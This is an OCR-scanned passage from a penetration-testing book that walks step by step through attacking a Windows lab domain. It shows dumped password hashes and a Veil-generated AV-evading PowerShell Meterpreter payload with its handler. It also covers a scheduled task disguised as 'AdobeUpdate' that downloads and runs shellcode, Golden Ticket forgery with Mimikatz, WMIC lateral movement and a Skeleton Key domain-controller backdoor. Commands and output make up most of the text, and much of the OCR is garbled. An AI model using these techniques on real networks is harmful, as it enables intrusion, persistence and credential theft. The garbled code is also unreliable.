ikrbtgt:502:aad3b435b51404eeaad3b435b51404ee:04f3c2fa60ed9f8f30803df6837ebed3::: 
testuserl:1106:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
ltestuser2:llO7:aad3b435b514O4eeaad3b435b51404ee:Oaa3d8c4a87962d9356eO9480de5ebbe::: 
l imit edjjser:1110:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
limiteduser:llll:aad3b435b51404eeaad3b435b51404ee:0aa3d8c4a87962d9356e09480de5ebbe::: 
root@kali:/opt* | 


Extracting Hashes 


This is just another way to dump domain hashes. In various tests, I have had either SMBExec or 
psexec ntdsgrab not work for some odd reason. In other words, there were times when one tool 
worked while the other tool did not. Therefore, make sure you have both of these tools in your back 
pocket. 




Persistence 


One thing that I skipped in the last book is different ways to create persistence. I have found that there 
are tons of different ways to accomplish this (even the cheap method of dropping the binary in 
startup), but here are a few of my tricks. 


Veil And Powershell 


Veil has been great for evading Ay but it can also create PowerShell Meterpreter executables. I 
really prefer having PowerShell files over actual binaries, just because you never know what AV 
might pickup on. Let’s use Veil to create a quick payload. 

• cd /opt/Veil-Evasion/ 

• ./Veil-Evasion 


First list off all of the available payloads by using the command list: 


Available commands: 


use 

use a specific payload 

info 

information on a specific payload 

list 

list available payloads 

update 

update Veil to the latest version 

clean 

clean out payload folders 

checkvt 

check payload hashes vs. VirusTotal 

exit 

exit Veil 


[>] Please enter a command: list 

Since we want to use Meterpreter Reverse HTTPS, we can pick the following: 
17) powershell/meterpreter/revhttps 


We need to define all the parameters, so that the Meterpreter session can connect back to our host. Set 
the following information: 


Name 

Current Value 

Description 

IHOST 

LPORT S443 
PROXYN 


IP of the metasploit handler 
Port of the metasploit handler 
Use system proxy settings 


For example, my Kali Linux host is 172.16.151.140. To set the Local Host: 






[>] set LHOST 172.16.151.140 
[>] Please enter a command: generate 

[>] Please enter the base name for output files: reversehttps 


And your output might look something like the following: 


Veil-Evasion | [Version]: 2.15.3 


[Web]: https://wvAv.veil-framework.com/ | [Twitter]: (aVeilFramework 


[*] Press [enter] for 'payload' 

[>] Please enter the base name for output files: reverse_https 
Language: powershell 

Payl oad: powe rshell /me t e rp ret e r/ rev_ht t ps 

Required Options: LH0ST=172.16.151.140 LP0RT=8443 PROXY=N 

Payload File: /root/veil-output/source/reverse_https.bat 

Handler File: /root/veil-output/handlers/reverse_https_handler.rc 


[*] Your payload files have been generated, don't get caught! 


[>] press any key to return to the main menu: | 


Veil-Framework 


Take a look at the two files created. The reverse_https.bat file will contain what looks like to be the 
following: 


root0fc«l< /opt/VH-£v»i root&ajli rtvtrst.ftttps bit pstoU tut <*/v«4-output/ rootQfcAi. / 


lecho off 

if VnOCESSOA.MCHITECUKEWxM lpowersheU.exe -NoP -Non I ■* Hidden -Exec Bypass -Coa»and "Invoke-Expresslon JINew-ObJec 
lO.Streaafleader ItlNow-ObJKt lO.Coepresslon.OeftateStreaa (JINew-ObJect JO.HeaorySUeas (,l([Convert)::Froa8ase$4Slrlng 
\‘m'Rtb9pIEP7Or>hZo5*tyflo0f€MpVSpsldoTSNS#«(Xll325Ldmrr<«Wi/l > oOlY/Qr/fF6."P:vt'“:rf«)3»O7S:G9ELKdy:*.rrOPfldrstHCeudCwZ 
»ZcllisJySwouLM2M<2KHlsCtllbksl*l)t3»J/fWihgsU<iU0lUnlbiflW)»UtdbSafoov7rtWtfrftf*by8»gt3iTBpfi8cn««.9Y«flSBtMpCyPL5ZYbVPJ 
/•.o-Z’V'j-gt'-ifhJS.'vsKlESin*h‘^ i . , afcJUGBa:i.-j<f0uri3.*»6jPl<*/HllSl«fh6N»4»j/*k'j:.:jff//>jHr.t<F8tU 1 a undl ::;oj.Hn l m..p 

-7*»ZE9zoOcpN3<l*dr3(totRxhQ6iy«b9t:fli8JfX8daftb)qb»X#8/i)b8nCHyojTofEnfoOaOPykzt.6AH'»Hlx|N«'j40HOnl.ki97*t2Cxu2dNg7USslOJ 8(*oqLU 
,/*VtC3o3NgydRdOvUW4nOwH/4SiSU\SX0ZlRLe39ZbVTzY4xoIOv<Br*)Y2olb«aBIJp)K4K]..owf7cRc£dIworYF6SMhc2rsKn/4zi"i4XKI*C6223B.O 
X>B6)cJk40(f<iTwJcl(fTrrOdnTkbVhKS0Z19xVg3dgV»dQFI3hU3gv)oUlxR8«0VI««ftfIBLPS880/Zdp«rlCr03n7PN7N4fKnI708ht48)yLSS44x(XniSrS2Xq/yci 
ngs»Ih a 6P.’.k l il70<3MFl0SZaEu)iMlfiUN«bbU»jE!:dZF.a.-c£p/h/0BPkh!:MlZ8I«£l-*riSL6u l ..Zo‘'OTlor(:H9TP:kc.3»!C4q.;-«:wklooTq4.w£n 
)lueOLe*fCh)dol4XNUkgywl»79c#l4lkd:Zkwrv.UlUSUb7)dptXnftOz5<J»«M.UrrpfW8uWlvtN»tHt)P\gNdgi>u4ft|7/»i«IHZn»IOf : 7g3$ui»xB7»H9Fug 
WEC<»eM*E>'*«*fY««‘fkdZ93/:ofC|)*:R1s(XM-’/f6vydssr«»X0tkdcIW!KHiot(ie«itr>lwII»iBVN«P:«|HF*0S«l»k /j.0WZ3oS«CdOX)Z«5«ei*W* 
\7XpaE/YgW05fCXQ4hNl»pW31htnC6tr8pJstn9VvyJRNxpBTWp(k*Tk24Vb<»n8<brZ/gI*\ - )))), [ 10.Compression.Coapresslocftode)::0eco«pr 
ns)), [Toit.Encoding]::*SCII)) .RoadloEndl);") else (%WinOlrVsyswow64\wlndowspow»rsheU\vl.8\poiiorshoU.oxo NoP -MonI -» 
Hidden -Exec Bypass -Coaaand ‘InxokeExpression $(New Object lO.Strewfteader (({New-Ob)act IO.Coaprosslon.OenateStreaa ( 
KNew-Object lO.NeaoryStreaa (.$( (Convert |: :Froa6»se64Strlng(\-nVRtb9plEP70rihZei*t'd4e8fC2wIpNSpsldolSkSe800l32gl.dZ7;rrd0k 
i/PeOlV/0c/fF6.nP:xPI1zON«O34075:0S€Lit(ly2XirrtPRgFstN0ElkdbwZ50Zclh»Jy5<««dl.H2t*(2XHlsCtNLbksi.\)t3aJ/-N.kHg4UHJ0tUnlblflW)8 
ULqbS8Neev7rterePfRf+by8Agt3iT8p&8cna**9YaHS8tHpCyPl5/VbYPJp*xe/Z79Sgbnirn7S/vsKiES8aXn5EvafcJleGBaU23rCE{Xjz03wBiixix*/MT 
5Mh6Hv46/kkStvt3ff//6Hr*NEF8tU/LtX»dLSgyU*flOn'; •HrXan**bk7eaZE9;oQcpN3xl»dr3GolRxhQ6xyx69ORlOJfX0d«fEb)<JbAXv8/Qb0hCHyo 
TofSn/oWyk.-lbAM/M>qfi»lMCflC*XW7WtXxu2iy(g?USs!0)ex»odlUI/vUtC3o3NgydRdoy.iNV4nOwH/4SnSU«XB7tRU3qrbVT7Y4xoI(WC8nKJV2o 
,bKa0IJpjK4k)»<(iwf7cRoEgIworYF6S<il?K2rskn/4zrHa4»kMkC«238att 1 Wi8J<Jk4O ) l4B*)<lHf*fldft!kW7'f<SOZ19xVgOggY*dOF9huJg*JetllxR8aOVl 
.aW!B.PE8B:.'ZdpwlCf03n7PH-JN4fknI70ebHej>.OvM.OLniSzSzV|/ > ot)i < ,*(l!, !) BRw1ki#t7t)4*4FltSZatvim.ll«bot*.d«ezdZr,aZc{p'n Cer-h 
llG&Z8Ia£h6YISL6uUxZofHJTlTnCN9TPCkp*341C4q.znec;n. :MTq4*^--(]i'jBCU&*f:>ildeX4xNONg'|Wi*79:ed4Lxqj2kwYV*U\Lz5IJb7Jqptir-p:.-E- J x 
«ti 0rzpn*iyjiHxtNvtHCetgNdg»u4RI7 'adVlHZr«f7g;^uxnx87»HSfi*glJWOiOHfEVVIkfltneaS'Kd7gJ/rorCpK.Btsdc50r.' , t<ydssr<WCfkdc lwp*H 
(etC0bthlgaz:%BVRaP:e;RHCS«Sm.u3.8xnZZfoSwC(«KJZ8MBl»«:an7l(peE/yg«n8SfC«(!4<«tepWlMnCMfep3stn9VyyJRHxp81O«pO,fk24n> 
nBcbrZ/gM "))!)> (IO,Co*presslon.CoapresslonNode)::Decoapress|), [Text.Encoding)::«SCII)).ReadToEnd();') 


PowerShell Encoded Meterpreter 


This is a PowerShell compressed bat file that will detect processor architecture and implement the 
proper PowerShell payload to connect back to your listener. 

The second file is a resource file, as we have seen before, that will automatically set up our handler 
to accept the PowerShell payloads. Kick off the resource file with “msfconsole -r /root/veil- 
output/handlers/reversehttpshandler.rc”. 





















[*] Processing /root/veil-output/handlers/reverse_https_handler.rc for ERB directives, 
resource 

(/root/veil-output/handlers/reverse https handler, rc) 

> use exploit/multi/handler 


resource 

(/root/veil-output/handlers/reverse https handler.rc) 
> set PAYLOAD windows/meterpreter/reversehttps 


resource 

(/root/veil-output/handlers/reverse https handler.rc) 


> set LHOST172.16.151.140 


resource 

(/root/veil-output/handlers/reverse https handler.rc) 


> set LPORT 8443 


resource 

(/root/veil-output/handlers/reverse https handler.rc) 
> set ExitOnSession false 


resource 

(/root/veil-output/handlers/reverse https handler.rc) 
> exploit -j 


[*] Exploit running as background job. 

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/ 
[*] Starting the payload handler... 
msf exploit(handler) > 


Now you can do a few things here. You can drop that bat file into the startup folder, configure a 
scheduled task to run that PowerShell script, or execute the PowerShell from a command line. 


To run it from a command shell, you need to remove the backslashes (two of them), change the inside 
quotes to ticks, and remove the ending parenthesis. For example, from the reverse_https.bat, we 
stripped out just what we need to execute the Meterpreter (and cleaned up the backslashes, inside 
quotes, and end parenthesis). The benefit of this is that you don’t need to download any PowerShell 
script. The whole payload is compressed in the command below (for 64bit systems): 


%oWinDir%o\syswow64\windowspowershell\vl.0\powershell.exe -NoP -NonI -W Hidden -Exec 



Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object 
IO.Compression.DeflateStream ($(New-Object IO.MemoryStream 

($([Convert]: :FromBase64String(‘n VRtb9pIEP70rxhZe5KtYMe8NE2wIp WSpsldoTSk.. ,pKRtsdc5C 
[IO. Compression. CompressionMode]::Decompress)), [Text.Encoding]:: ASCII)).ReadToEndQ;" 


We can also drop the reverse_https.bat onto the host, put it in the startup folder, and on a successful 
reboot get a full Meterpreter session back to our host: 


msf exploit(handler) > 

[*] 172.16.151.202:49850 Request received for 73gZh... 

[*] 172.16.151.202:49850 Staging connection for target 73gZh received... 

[*] Meterpreter session 2 opened (172.16.151.140:8443 -> 172.16.151.202:49850) at 2015-01-13 
03:02:18-0500 


Persistence With Schedule Tasks 


We are going to reuse the PowerSploit invoke-shellcode to keep persistence on the host system. 
Because we have limited space in the schtask function and we may want our reverse https 
Meterpreter sessions to change destination hosts, we are going to modify the invoke-shellcode 
PowerShell script and repost it. Once re-posted, we will configure a schtask to run once a day and 
connect back to our Meterpreter handler. {24} 


First we need to grab a copy of invoke-shellcode and modify it. We will use our Kali host machine to 
modify the invoke-shellcode script. 

• cd /opt/PowerSploit/CodeExecution 


As we said before, we are limited in space, so we are going to copy the original file to a shortened 
file: 

• cp Invoke-Shellcode.ps! l.psl 


Next, let’s go ahead and edit l.psl script and add our reverse shell information at the bottom of this 
psl file. To do this, add the following line while filling in the Listener IP and Port: 

• Invoke-SheUcode -Payload windows/meterpreter/reversehttps -Lhost 
[LISTENER IP] -Lport [LISTENER PORT] -Force; 


For example, my Metasploit handler is on 192.168.199.128 and listening on port 8443. I add this to 
the last line: 

• Invoke-Shellcode -Payload windows/meterpreter/reversehttps -Lhost 
192.168.199.128 -Lport 8443 -Force; 



l.psl (/opt/PowcrSploit/Cod*Exccution) - VIM 


File Edit V* w Search Tarminal Help 


{CloseHandleAddr - Get-P roc Address keme'l32.dVl Clos«Handl« 

$CloseHeryfteOe\egate ■ Get-DelegateType @<IIntPtr]) ((Bool)) 

{CloseHandls = (System.Runtlne.InteropServlce*.N#r*h«i]::GetOetegateForfunctionPointer(tCloseHan<fleAi 


Wrlte-Voroose "Injecting shellcoda Into P1D: IProcessId" 


) 

else 

{ 


If | IForce -or {psCmdlet.ShouldContlnuel 'Do you wish to carry out your evil plans?', 

"Injecting shollcodo Injecting into {((Get-Process -Id {Processld).ProcossNaee) ({ProcessId 

{ 

Inject-RenoteShellcode {Processld 

) 


# Inject shellcode Into the currently running PowerShell process 
{VirtualAllocAddr = Got-ProcAddress kernel32.dll VirtualAlloc 

{VirtualAllocDelegate « Get-DelegateType <?(IIntPtr], [UInt32], (UInt32), (UIm32)) ((IntPtr)) 
{VirtualAlloc • (System.fo/itwe.InteropServlces.Marshall: :GetDelegateForFunctionPointer({VirtualAllo( 
{VirtualFroeAddr = Get-ProcAddress kemel32.dll VirtualFree 
{VlrtualFreeDelegate « Get-DelegateType {((IntPtr], (Uint32), [UInt32)) ((Bool)l 
{VirtualFree • (System.Runtime.InteropServices.Marshal]::GetOeiegateForfunctlonPolnter($VlrtualFreeAi 
{CreatelhreadAddr = Get-Proc Address kemel32.dll CreateThread 

(CreateThreadDelegate « Get-DelegateType @((IntPtr], [UInt321, [IntPtr], (IntPtr), (UInt32), (IntPtr 
{CreateThread • (System.ftuntwe.InteropServlces.Marshal]: :GetDelegateForFunctlonPolnter($CreateThreai 
WaltForSlngleObJectAddr = Get-ProcAddress kemel32.dll WaitForSlrvgleObJect 
WaltForSlngleObJectDelegate •Get-DelegateType @(l IntPtr] , (Int32]) ([Int]) 

{WaltForSlngloOPJoct • (Systee.Runtime.InteropServlces.Marshal]:(GetDolegateFcyfunctlonPolnter({Waltl 
;ct Delegate) 

Wrlte-VorOosa "Injecting shellcode into PowerShell* 

If ( {Force -or {psCmdlet.ShouldContlnuel 'Oo you wish to carry out your evil plans?', 

"Injecting shellcode Into the running PowerShell process!" ) ) 

{ 

Inject -LocalShellcode 

) 

) 


LfU 


Ilnvoke-Shellcode -Payload windows/meterpreter/reverse_https -Ihost 192.168.199.128 -Lport 8AA3 -Force; 

! . pm ! * t ees: A) •» ! »»«• - 


Modifying Invoke-Shellcode 


We now have our shortened invoke-shellcode script and can move this file off to a web server. In this 
example, we can just move it to /var/www and start the apache web server: 

• cp l.psl /var/www/ 

• service apache2 start 


Validate this by going to http://[ Your IP]/I .psl 


Generally, I would host this file on a URL shortened site, but for this example, we are just hosting it 
locally Everything is set up to add persistence to our victim host. All we need is a shell and the 
following command: 


• schtasks /create /tn AdobeUpdate /tr 

"c:\windows\syswow64\WindowsPowerShell\vl.O\powershell.exe -NoLogo 
WindowStyle hidden -Nonlnteractive -ep bypass -nop -c 'IEX ((new-object 
net.webclient).downloadstring("http://[YomW]/l.psr"))"' /SC DAILY /ST 12:00:00 

This creates a schtask named AdobeUpdate that runs at noon everyday to download your modified 
PowerShell script and execute it. Two additional options are: 

• If you have system privileges, you can run the script under system. Just add the 
following switch to the above command: 

o /ru System 

• If you are attacking a 32bit Windows system, change the PowerShell location in 






your schtask to: 


o c:\windows\system32\WindowsPowerShell\vl.0\powershell.exe 


Golden Ticket 


Kerberos is something extremely important to understand. Since explaining exactly how Kerberos and 
Kerberos Tickets work is pretty complicated, I will direct you to a SANS blog article that covers this 
topic well. 


Full Link: 

http://digital-forensics.sans.Org/blog/2014/l 1/24/kerberos-in-the-crosshairs-golden-tickets-silver- 

tickets-mitm-more 


Bit. ly Link: 
http://bit.ly/1 DKOkaS 


In short, Kerberos is used as an authentication and authorization platform, which uses tickets. What if 
you could create you own tickets to authenticate to any server? That is exactly what the Golden Ticket 
could do. On the topic of persistence, let’s say you have compromised a Domain Controller in the 
past and dumped all the hashes. Your client tells you a week later that they fixed all the 
vulnerabilities that you identified to get Domain Admin and changed all the passwords. They hire you 
again to see what you can do. You do the normal social engineering to get your initial shell, but now 
you are only a limited user. All the initial entry points are now blocked and they have limited 
scanning detection/prevention. 

With the Golden Ticket, you don’t have to worry about anything. You can take the old krbtgt hash 
from the previous hash dump and promote yourself back to a Domain Admin. Best of all, you can do 
all this with an unprivileged account. A few things you need to know about the krbtgt: 

• It is not recommended to reset the system generated password. It could break the 
whole domain. Therefore, it is generally never changed. (Although Microsoft recently 
released a tool to handle resetting the krbtgt account). 

• Even if you change every password for every domain admin, you can still become a 
DA. 

• The only time I have seen the system generated password changed is from a function 
2003 to 2008 upgrade. 

• You can create Users and Groups that don’t exist with the Golden Ticket. 


So what do you need to perform the Golden Ticket attack? (25} {26} {27} 

• 1) Domain 

o On a victim host type: whoami 

• 2) Domain Admin User 





o On a victim host type: net localgroup administrators /DOMAIN 

• 3) Domain SID 

o On a victim host type: whoami /user 
o Chop off the last dash and four digits 

• 4) Krbtgt 

o From a previous hashdump, you just need the second half of the hash 
(just the NTLM hash) 


^ msf exploit (lnaiidUr) > sessions -i 2 
E I * I Starting interaction with 2... 


J meterpreter > shell 
Process 1708 created. 

^Channel 2 created. 

^Microsoft Windows [Version 6.1.7601] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


]C:\Users\testuserl\Desktop>whoami 
whoami 


lhacker\1estuserl 


© 


|C:\Users\testuserl\Desktop>net localgroup administrators /DOMAIN 
inet localgroup administrators /DOMAIN 

hhe request will be processed at a domain controller for domain hacker. 1 


I Alias name 
iComment 


administrators 

Administrators have complete and unrestricted access to 1 


JMembers 


lAdministrator 
^Domain Admins 
Enterpr ise Admins 
Fab ' 


© 


iLocal Admin 

The command completed successfully. 


C:\Users\testuserl\Desktop>whoami /user 
whoami /user 


I USER INFORMATION 

-i 

■bser Name SID 


hackerYtestuserl 


S-1-5-21- 3525058729-1821581466-2040179600 


© 


1106 


Information Needed to Create Golden Ticket 


As seen in prior examples, to get the krbtgt hash, we first had to dump all the domain hashes. This can 
be accomplished using smbexec with a Domain Admin account. Running smbexec, I chose Hash 
Dump and dumped the Domain Controller. 






* ■ r ■ I r 1 ■ r n i r , + ■ t M * * * 4'*'* <¥'+■* 4* * 4f* i'M'* W.'M** * * M ■ M M M M 4 M M 4 M M M M t H 


* smbexec 2.3 ■ HachiateIlian * 

tinni t m>m mmttmiiHiii tM i* t* ***** t **t*t ... 


Hash Dunn Hrrin 


1. Domain Controller 

2. Workstation & Server Hashes 

3. Main menu 


172.16.151.200 
hacker. testlabYlab 
Pass: Itedfasdfasdfl! 


Choice : 1 


Gather hashes from the Domain Controller's NTDS.dit file 


Target IP, host list, or Map XHL file [172.16.151,2'; 1 : 

Username [lab] : 

Password or hash [Pass: ftsdfasdfasdfl ] ; 

Domain [ hacker.testlab] : 

Enter the Drive tO $Sve the Shadow Copy and SYS key [C;[ ; 

Enter the Path to save the Shadow Copy and SYS key [\Windows\TEHPj : 
Enter the Drive where the NTDS.dit file is [C:]: 

Enter the Path to the NTDS.dit file [\Windows\NTDS] : 



[*j Checking if space exists to copy files,,. 

[*| Creating shadow copy... 

[*| NTDS.dit percent copied: Complete 

['] ntds.dit copied to ,/log/smbexec-2015-1-5/hashes/172,16,151.2G3/ntds,dit 
[*1 sys copied to ./log/smbexec-2015-l-5/hashes/172.16.L51.200/sys 
!*| Deleting shadow copy id [3e52ed43*78 i la-'llcf-b266‘18702e55986f].,. 

[*| Deleting copied files from C:\Windows\TEHP.,. 

[*] Exporting NTDS file contents, this might take a while., . 



Recovering Hashes from the Domain Controller 


Once completed, a log file will be created with the Domain Hashes. The hash that you will need is 
the second part of the krbtgt hash. 


root@kali. /opt/smbexec 


172.16.151.200-DC_dump.txt (/op ...log/smb.. 



krbtgt’s Hashes 


Now we have everything we need to create the Golden Ticket. Go back to our original shell: 

• First drop into Mimikatz 2.0 

o use kiwi 

• Create Golden Ticket 

o golden ticket create -u <Domain Admin Username> -d <Domain> - 
k <krbtgt hash> -s <Domain SID> -t ^Location to Drop Golden Ticket> 


■iliimtil > hm kiwi 
Loading atension kiwi,,. 

.««#. mimikatz 2,0 alpha {xB6/win32) release 'Kiwi en C" 

if - i 

/ \ ## /* * i 

\ / ## Benjamin DELPY gentilkivi ( benjamin@gentilkiwi.com ) 
v ##' httpi//blng.gentilkiwi,com/siiikat; (oe.eo) 

'#####' Ported to Hetasploit by 0J Reeves ’TheColonial' * * V 


MI Loaded k86 Kiwi on an *64 architecture, 
success, 

meteroreter > oolden ticket create *u lab -d hacker *k 04f3c2fe60ed9fBf3tffi03df6337ebed.3 
■s S-1■5 -21■3525058729' 1S215B1466 ■2040179600 -t /opt/ticket.txt 

1+1 Golden Kerberos ticket written to /o&t/ticfcet.txt 


Creating the Golden Ticket 


That’s it. We now have a Golden Kerberos Ticket. As we said with our scenario before, your client 
SUCK has asked you to come back for a remediation test. You verify that they fixed all the holes from 
last time and passwords are reset, but remember you have the Golden Ticket. 














You use a little spearphishing to get your initial handle into the company with an unprivileged shell. 
You test your access by trying to see if you can read any files on the Domain Controller, but you don’t 
have access. You take a look at your Kerberos tickets and see that you are a limited user. 


Using the Golden Ticket 

• Shell Access with Limited Access (does not have to be Local Administrator) 

o sessions -i [id] 

• Load Mimikatz 2.0 

o use kiwi 

• Check current Kerberos Tickets 

o kerberos ticket list 

• Purge all Kerberos Tickets 

o kerberos_ticket_purge 

• Local our Golden Ticket (stored in /opt/ticket.txt on our Kali VM) 

o kerberos ticket use /opt/ticket.txt 

• Drop into a shell and read files off the DC 

o shell 
o dir \\DC\c$ 

Below, we are checking out what Kerberos tickets are currently have loaded. From reading the 
access, all the tickets are currently owned by testuserl (limited account). 



[*] Htterpmtir SfSSibh 7 Op«n*d (172.16,151,128:8680 172,16.151,202:5ffi54) at 2015-01-06 00:26:18 -0500 

is! *npUit{ti.w " ) > StSSlWS -1 7 
p] Etartiftg interaction with 7... 

net*rpreter > use kiwi 

Loading km.,. 

liiikitz 2,0 «l|pti9 (x86Mn32) release "Km en C' 

ftf “ it, 

»/\M /» * * 

sf \. /» &Fijann pElPt gentiUkivi' ( benjeiin^entilkmeoi J 
“« / *r http://blog.gMtilkiwi.coi/iimkatz <e«-,to! 

Ported te Ketasplort by OJ Reeves 'TheCplonier * 1 */ 


UJ Loaded *06 Kiwi m an *64 architecture, 

success 

interpreter > kirt*ra*_tiek#t_ 

k e rb eros_ 1 1 c ke t_llst kerbs ros_ tic k et_p urge k e rbe rus_tK k et _us e 

interpreter > kirtirgs.ticket.lTst 

Kerberos Tickets 

Server Client Start 

Flags 



UDAP*/OC-hacker, t estlab/tiacke r.testUb 0 H ACKEft. TESTLA& ts stuse rl $ HACKER. TEST LflS 2&S- 01 - OS 05: 2: 30- 0® 
,0M 40350000 (NAhE CUHNICALIZE, OK AS DELEGATE, PRE AUTOENL RENEWABLE, RJfflAflOABLE} JULJlJ E—fL 
cifS/dc.hac k e r,t estlab £ HACKER.TESTLAB te Stuse rl £ HACKER.TESTLA8 2015 - 01- OB E; 22 :23.000 

.000 flOuSOCHM CUAHE CANONICAL!^ OK AS DELEGATE, m ALfTHENT, RENTABLE, FOWCABLE) 
krbtgt/HACKER-TESTLA8 $ HACKER. TESTLAB ttStUSirl £ HACKER,TESTLAB 2015-01-08 05:22:23.000 

.COO 60a 10000 (NAME CANONICALIZE. PPE AUF1BIT, REtDlAELE, FGfflAHH), FCffirtARDASJE) 
k rht^t/HACKEft. TESTLAfi $ HAMR. TESTLAB te stuse rl $ HACKEft. TESTuS 2915 0106 02:11(29-000 

. GOO 40*10000 (HW£ CANCNICALIZE, PPE AUTkENT. INITIAL, ffiBUfiLE, RJfWRDABLE) 

Idap/dc.hitker.testlab £ HACKER.TEBTLAB teStuserl $ HACKER, TESTLAB 2015-01-07 06:42:43.000 

.000 AQaSOOOO (NAS CawCNICalIZE, OK AS DELEGATE, PRE AUThEMT, RE^aBlE, FORwARCaBlE} 

Total Tickets j 5 


Current Kerberos Tickets 


We can verify this by dropping into a shell: 


meterpreter > shell 
Process 1524 created. 

Channel 1 created. 

Microsoft Windows [Version 6.1.7601] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C: 1 Users\testuserl \Desktop>dir 1 \dc\c$ 






dir \\dc\c$ 
Access is denied. 


Without Domain Administrative privileges, we can’t log into the Domain Controller. We need to first 
purge all of our current Kerberos tickets. Once purged, use our Golden Key to create a “lab” user 
ticket. From the work prior, we found that the lab account had been part of the Domain Admin group. 


Once we list our tickets again, we see below that we now have a “lab” ticket in our ticket list. 


mete rp refer > kerberosjicketjsurge 

f+J Kerberos tickets purged 

mete no refer > kerberos ticket_use /opt/ticket,txt 

Using Kerberos ticket stored in /opt/ticket,txt. 1033 bytes 
[+] Kerberos ticket applied successfully 
mete re refer > k*rberos_ticket_Ust 

‘Kerberos Tickets 


iServer Client Start End 


krbtgt/hacker $ hacker lab £ hacker 2015-01-07 08:37:54.000 2025-01-07 03:37:54,000 
E r FORWARDABLE) 

Total Tickets ; 1 
meterorefer > I 


Importing “lab” Kerberos Tickets 


If we do a listing on the Domain Controller, we can see that we now have full access to the DC. They 
could have changed every user account password after the initial hashdump, but with the krbtgt hash, 
we can create any Kerberos ticket we want. 









I meterpreter > shell 
Process 2644 created. 

Channel 7 created. 

Microsoft Windows [Version 6.1.7601] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Users\testuserl\Desktop>dir \\DC\C$ 
dir \\DC\C$ 

Volume in drive \\DC\C$ has no label. 

Volume Serial Number is 40F8-1BB4 


Directory of \\DC\C$ 


08/22/2013 

07:52 

AM 

<DIR> 

PerfLogs 

12/28/2014 

02:28 

PM 

<DIR> 

Program Files 

08/22/2013 

07:39 

AM 

<DIR> 

Program Files (x86) 

01/06/2015 

10:52 

PM 

<DIR> 

Share 

12/28/2014 

02:28 

PM 

<DIR> 

Users 

01/05/2015 

01:02 

AM 

<DIR> 

Windows 


0 File(s) 0 bytes 

6 Dir(s) 20.697,817,088 bytes free 


[C: MJsersXtestuserlXDesktop^ [| 


Accessing the Domain Controller 


With the Golden Ticket, we have access to servers, and can drop files, but how can we execute 
commands using the Kerberos Domain Admin Ticket? 


As shown in prior chapters, WMIC supports the ability to execute remote commands. This command 
uses the current Kerberos Tickets against a remote server (Node). We are going to execute a ping 
command, write that to a file on a remote Windows 8 server from our compromised Windows 7 
Golden Ticket box. 


• wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create 
"cmd /c ping 127.0.0.1 > C:\log.txt" 


C:\Utm\t4ftuurl\DttktOMLC /iutt^rt«ns■ hackei 1 ■ MUbWl# /Mde:rfn8 fW® till create L ud /£ 
ping 127.0.0.1 > C:\log.tif 

rtic /au-tianty: r KerDeros:lacifer.testlaa\vinO r Aiode:wnS process call create 'cic /c ping 127 . 0 . 0.1 * Ci\ldg.txt 1 
Eiec utnig (Win 32 _Proces 51 ■rfrtate() 

Hethod execution successful, 

Out Parawten; 

iiutncttf POWERS 

{ 

mmU - 4576 : 

ReturnValue a Q; 

h 


WMI and Kerberos Ticket 


Double-checking our Windows 8 host, we see that the command was successful and we can now 
move laterally throughout the whole domain. 




k F*i-o*iIb 
■ D«ktcp 
jg Downloads 
Vi Recent places 


4 Libraries 
*1 Documents 
J 1 Musk 
Pictures 
H Videos 

^ Computer 
M Local Disk (C) 
lit Peril09s 
1*. Program Files 
, Program Files (i96 
Jt Users 

M ub 

M Public 
J| testuse»2 
win’ 


f~~l Name 


Date modified Type 


Perflogs 
Program Fdes 
Program Fdes (*86) 
il Users 
,i- Windows 

a, »og 



See 


File Edit Format View Help 

Pinging 127.0.0.1 with 32 bytes of data: 

Reply from 127.0.0.1: bytes-32 time<las TTL-128 
Reply fron l(27.0.0.1: byt«s-32 ITL-128 

Reply frow 127.0.0.1: bytes-32 tiwe<lws TTL-128 
Reply frow 127.0.0.1: bytes-32 tiwe<lws TTL-128 

Ping statistics for 127.0.0.1: 

Packets: Sent - 4, Received - 4, Lost - 0 (0% loss). 
Approximate round trip times in milli-seconds: 

Minimum - 0ms, Maximum - 0ms, Average - 0ms 


Validate Command Execution 


Skeleton Key 


As a penetration tester, one of your greatest resources is monitoring what the real bad guys are doing. 
For example, Dell Secureworks identified malware that would backdoor privileged Active Directory 
accounts: 

http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/ . 


Luckily for us Benjamin Delpy and his amazing tool Mimikatz implemented the Skeleton Key feature. 
{28} This attack will backdoor a Domain Administrative account. Let’s say you have already gained 
a domain admin account and you were able to log into a domain controller (remember you will have 
to do this to every domain controller in the environment). We can put a copy of our modified 
Mimikatz on there so we don’t trigger antivirus. 


To install our Skeleton Key is pretty easy: 

• mimikatz.exe “privilege::debug” “misc::skeleton” exit 












^00 * Windows Server 2012 



kl:\Users\lab\Desktop\x64>mimikatz.exe "privilege: :debug" “misc::skeleton" exit 


.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Dan 22 2015 22:16:09) 

.## A ##. 

## / \ ## /• * * 

## \ / ## Benjamin DELPY gentilkiwi' ( benjamin@gentilkiwi.com ) 

'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 

'#####' with 15 modules * * */ 


mimikatz(commandline) # privilege::debug 
Privilege '20‘ OK 

mimikatz(commandline) # misc::skeleton 

[KDC] data 

[KDC] struct 

[KDC] keys patch OK 

[RC4] functions 

[RC4] init patch OK 

[RC4] decrypt patch OK 

mimikatz(commandline) # exit 
Bye! 


Skeleton Key 


If we go back to any computer on the network and try to connect to the Domain Controller, of course 
we won’t have access with our regular Active Directory account. We try to run “dir \\dc\c$” to read 
the C-Drive on the domain controller. But don’t forget about our skeleton key. 


Even if we don’t know the password of the domain admin account “lab”, with the Skeleton Key 
implemented, we can use the new backdoor password of “mimikatz”. 


To demonstrate this we can mount a drive from any computer on the network using the password 
“mimikatz” and with the “lab” account from which we executed the skeleton key from. 


In the first command we try to read files from the domain controller, but are unsuccessful. 
• net use * \\dc\c$ mimikatz /user:lab@hacker.testlab 


Next, we mount a share drive to the domain controller’s C-Drive using the “lab” account and the 
